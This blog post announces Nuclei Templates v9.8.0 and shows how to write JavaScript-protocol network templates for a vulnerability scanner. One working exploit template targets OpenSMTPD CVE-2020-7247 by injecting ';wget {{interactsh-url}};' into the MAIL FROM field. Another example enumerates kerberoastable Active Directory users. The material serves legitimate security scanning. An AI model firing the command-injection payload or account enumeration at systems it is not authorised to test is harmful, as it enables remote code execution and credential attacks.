Blog
-

7 min read

Nuclei Templates v9.8.0: A Leap Forward in Network Security Scanning

Nuclei Templates v9.8.0: A Leap Forward in Network Security Scanning

Share

Our nuclei-templates library boasts over 8,000 templates, encompassing more than 7,200 templates for web applications. This collection includes 2,200 web-related CVEs and features more than 850 templates aimed at identifying diverse web vulnerabilities. With many active community contributions, we're continuously updating our database with the latest web CVEs and vulnerabilities. We're also expanding our templates to cover network vulnerabilities, aiming for the most thorough vulnerability scanning possible.

We're thrilled to share that with the launch of Nuclei Templates version 9.8.0, we've broadened our scope of network security checks. With this release, we're inviting contributors (like YOU!) to help us in enriching network vulnerability detection, using the new JS protocol. This makes it simpler to incorporate network checks through the newly introduced JS modules.

In this blog post, we are going to share how we can use JS modules to write network checks, which checks we have covered so far, and our future plans. So let’s get started.

Our previous support for writing network templates via network protocol using raw/hex input has been helpful in writing basic exploits effectively. However, the complexity of security protocols such as LDAP, Kerberos, SSH, and SMTP necessitated a more versatile approach.

In Nuclei v3 we added the support for JavaScript protocol. This enhancement has empowered users to write more intricate checks that accommodate the complexity of various protocols. Through JavaScript templates, users can now craft multi-step exploits with loops, conditions, and other advanced scripting functionalities. This capability is not just a technical enhancement; it represents a paradigm shift in how security checks can be conceptualized and implemented.

Why JavaScript Protocol is useful

The JavaScript protocol serves as a bridge, narrowing the gap between complex network protocols and the accessible, user-friendly approach that Nuclei aims to maintain. This transition towards a more versatile scripting environment within Nuclei does not compromise on simplicity and ease of use. Instead, it enhances it, enabling both seasoned and novice security researchers to contribute meaningfully to the ecosystem.

For example:

  • LDAP and Kerberos: Traditionally, exploits involving LDAP or Kerberos required a nuanced understanding of authentication steps, making them difficult to encode in simple YAML-based DSL. JavaScript templates allow for a more nuanced approach, enabling the execution of multi-step authentication processes that can more accurately reflect real-world attack vectors.
  • SMB and RDP: Similar to LDAP and Kerberos, SMB and RDP protocols involve complex interaction patterns that are now more readily testable with JavaScript. Whether it's detecting anonymous access on SMB shares or identifying vulnerabilities in RDP implementations, JavaScript templates offer a flexible and powerful tool set for researchers.

Writing Your First JavaScript Template

First, we need to familiarize ourselves with the documentation for each protocol.

Example #1

In this tutorial, our focus will be on utilizing the JavaScript protocol for conducting the MSSQL check. For example, the MSSQL module's documentation simplifies the process of detecting a Microsoft SQL Server database. It features the IsMssql method, which determines if the target host is running an MS SQL database by returning true for a positive match and false otherwise.

To start crafting your template, you must first import the required module and initialize the client. Below is a guide on how to initiate the MSSQL client:

yaml

1
javascript:
2
  - code: |
3
      let m = require('nuclei/mssql');
4
      let c = m.MSSQLClient();
5
      let response = c.IsMssql(Host, Port);
6
      Export(response);

This code snippet checks if the given host is running an MS SQL database and captures the response. You can further refine this process by exporting the response, which makes it usable in matchers and extractors. This is especially useful when you want to automate the analysis of the response data:

yaml

1
Export(response);

To provide the necessary inputs such as host, port, username, and password, you can use the following arguments structure in your template:

yaml

1
args:
2
  Host: "{{Host}}"
3
  Port: 1433
4
  User: "admin"
5
  Pass: "password"

Debugging plays a crucial role in ensuring your template works as intended. Utilizing flags like -svd -v can help identify JavaScript Protocol response variables and troubleshoot any issues efficiently. This approach allows you to see the response and success status, which are critical for verifying the template's functionality.

Here's an example of how to log the response to the console for debugging purposes:

yaml

1
console.log(response);

Before finalizing your template, it's essential to verify the matchers, especially the response variable. Ensuring its accuracy is key to maintaining the template's integrity and functionality. Always rely on the success variable to assess the operation's outcome.

Here is what the final template might look like:

yaml

1
id: mssql-detect
2


3
info:
4
  name: MSSql Service - Detection
5
  author: yourname
6
  severity: info
7
  description: |
8
    Detects MSSql Service.
9
  metadata:
10
    verified: true
11
    shodan-query: product:"MS-SQL Server"
12
  tags: js,enum,network,mssql
13


14
javascript:
15
  - code: |
16
      let m = require('nuclei/mssql');
17
      let c = m.MSSQLClient();
18
      let response = c.IsMssql(Host, Port);
19
      Export(response);
20


21
    args:
22
      Host: "{{Host}}"
23
      Port: 1433
24


25
    matchers:
26
      - type: dsl
27
        dsl:
28
          - "success == true"

This template is designed to verify the existence of an MS SQL service on the specified host and port. It showcases the ability to employ JavaScript within Nuclei for conducting sophisticated assessments, utilizing programming constructs like conditional statements, loops, and bespoke logic. This approach enhances the thoroughness and accuracy of your security scans, leveraging the full potential of scripting for nuanced and targeted evaluations.

Example #2

Let’s write a little bit complex check, for example the OpenSMTPD CVE-2020-7247.

OpenSMTPD versions 6.4.0–6.6.1 are vulnerable to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.

  • You can find the SMTP Documentation here according to that, import the SMTP module, then invoke smtp.client() and smtp.SMTPMessage().

yaml

1
javascript:
2
  - code: |
3
      const smtp = require('nuclei/smtp');
4
      const client = new smtp.Client(Host,Port);
5
      const message = new smtp.SMTPMessage();
6
      message.From(From);
7
      message.To(To);
8
      message.Body(Msg);
9
      Export(client.SendMail(message));
  • We have then added the RCE payload in the FROM field ;wget {{interactsh-url}};

yaml

1
args:
2
      Host: "{{Host}}"
3
      Port: "8825"
4
      From: ";wget {{interactsh-url}};"
5
      To: "root"
6
      Msg: "Contact your security team if you do not expect this message"

The full template would look like this:

yaml

1
id: CVE-2020-7247      
2


3
info:
4
  name: OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution
5
  author: princechaddha
6
  severity: critical
7
  description: |
8
    OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
9
  reference:
10
    - http://packetstormsecurity.com/files/156145/OpenSMTPD-6.6.2-Remote-Code-Execution.html
11
  metadata:
12
    max-request: 2
13
    vendor: openbsd
14
    product: opensmtpd
15
  tags: packetstorm,cve,cve2020,smtp,opensmtpd,network,rce,oast,kev
16


17
javascript:
18
  - code: |
19
      const smtp = require('nuclei/smtp');
20
      const client = new smtp.Client(Host,Port);
21
      const message = new smtp.SMTPMessage();
22
      message.From(From);
23
      message.To(To);
24
      message.Body(Msg);
25
      Export(client.SendMail(message));
26


27
    args:
28
      Host: "{{Host}}"
29
      Port: "8825"
30
      From: ";wget {{interactsh-url}};"
31
      To: "root"
32
      Msg: "Contact your security team if you do not expect this message"
33


34
    matchers-condition: and
35
    matchers:
36
      - type: word
37
        part: interactsh_protocol
38
        words:
39
          - "dns"
40


41
      - type: dsl
42
        dsl:
43
          - success == true
44
        condition: and

Example #3

Similarly, we can use LDAP module to write basic check like returns all AD users who are kerberoastable using FilterIsPerson, FilterAccountEnabled and FilterHasServicePrincipalName filter query.

yaml

1
id: ldap-list-kerberoastable-users-test
2


3
info:
4
  name: test
5
  author: 5amu
6
  severity: info
7


8
javascript:
9
  - args:
10
      DomainController: "{{Host}}"
11
    code: |
12
      ldap = require("nuclei/ldap");
13
      client = ldap.LdapClient();
14
      users = client.GetKerberoastableUsers(Domain, DomainController, Username, Password);
15
      to_json(users);
16
    extractors:
17
      - type: json
18
        json:
19
          - '.[]'

Here are the JavaScript templates that have been incorporated into Nuclei-templates to date:

bash

1
pwnmachine@PD javascript % tree
2
.
3
├── cves
4
│   ├── 2016
5
│   │   └── CVE-2016-8706.yaml
6
│   ├── 2019
7
│   │   └── CVE-2019-9193.yaml
8
│   ├── 2023
9
│   │   ├── CVE-2023-34039.yaml
10
│   │   └── CVE-2023-46604.yaml
11
│   └── 2024
12
│       └── CVE-2024-23897.yaml
13
├── default-logins
14
│   ├── mssql-default-logins.yaml
15
│   ├── postgres-default-logins.yaml
16
│   ├── redis-default-logins.yaml
17
│   └── ssh-default-logins.yaml
18
├── detection
19
│   ├── mssql-detect.yaml
20
│   ├── oracle-tns-listener.yaml
21
│   └── ssh-auth-methods.yaml
22
├── enumeration
23
│   ├── pgsql
24
│   │   ├── pgsql-default-db.yaml
25
│   │   ├── pgsql-file-read.yaml
26
│   │   ├── pgsql-list-database.yaml
27
│   │   ├── pgsql-list-password-hashes.yaml
28
│   │   ├── pgsql-list-users.yaml
29
│   │   └── pgsql-version-detect.yaml
30
│   ├── smb
31
│   │   ├── smb-enum.yaml
32
│   │   └── smb2-capabilities.yaml
33
│   └── ssh
34
│       ├── obsolete-ssh-version.yaml
35
│       ├── ssh-diffie-hellman-logjam.yaml
36
│       ├── ssh-password-auth.yaml
37
│       ├── ssh-server-enumeration.yaml
38
│       └── ssh-sha1-hmac-algo.yaml
39
└── misconfiguration
40
    ├── pgsql
41
    │   ├── pgsql-extensions-rce.yaml
42
    │   └── postgresql-empty-password.yaml
43
    ├── smb
44
    │   ├── smb-anonymous-access.yaml
45
    │   ├── smb-shares.yaml
46
    │   └── smb-signing-not-required.yaml
47
    └── ssh
48
        ├── ssh-cbc-mode-ciphers.yaml
49
        ├── ssh-weak-algo-supported.yaml
50
        ├── ssh-weak-mac-algo.yaml
51
        ├── ssh-weak-public-key.yaml
52
        └── ssh-weakkey-exchange-algo.yaml

Conclusion


The integration of JavaScript for crafting dynamic templates across various network protocols represents a notable leap forward in network scanning technology. With this update, our team has introduced several examples that pave the way for advanced network scanning capabilities. As a result, Nuclei templates are now an essential resource not just for web vulnerability scanning, but for comprehensive network vulnerability assessments as well. These templates prove invaluable for penetration testers conducting either internal or network-based penetration tests and for organizations looking to scrutinize their internal networks.

As we delve deeper into the possibilities JavaScript offers within Nuclei templates, the horizon for innovation and improvement in network security broadens significantly. We are enthusiastic about the community's role in this evolution, encouraging contributions of additional templates, feedback, and suggestions for areas of focus in future updates. Our forthcoming objectives include enhancing our LDAP and Kerberos checks, marking yet another stride towards refined security scanning capabilities. For further help on crafting JS templates, check out our documentation here. You can also join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you, once again!

By leveraging Nuclei and actively engaging with the open-source community, or by becoming a part of the ProjectDiscovery Cloud Platform, companies can enhance their security measures, proactively address emerging threats, and establish a more secure digital landscape. Security represents a shared endeavor, and by collaborating, we can consistently adapt and confront the ever-evolving challenges posed by cyber threats.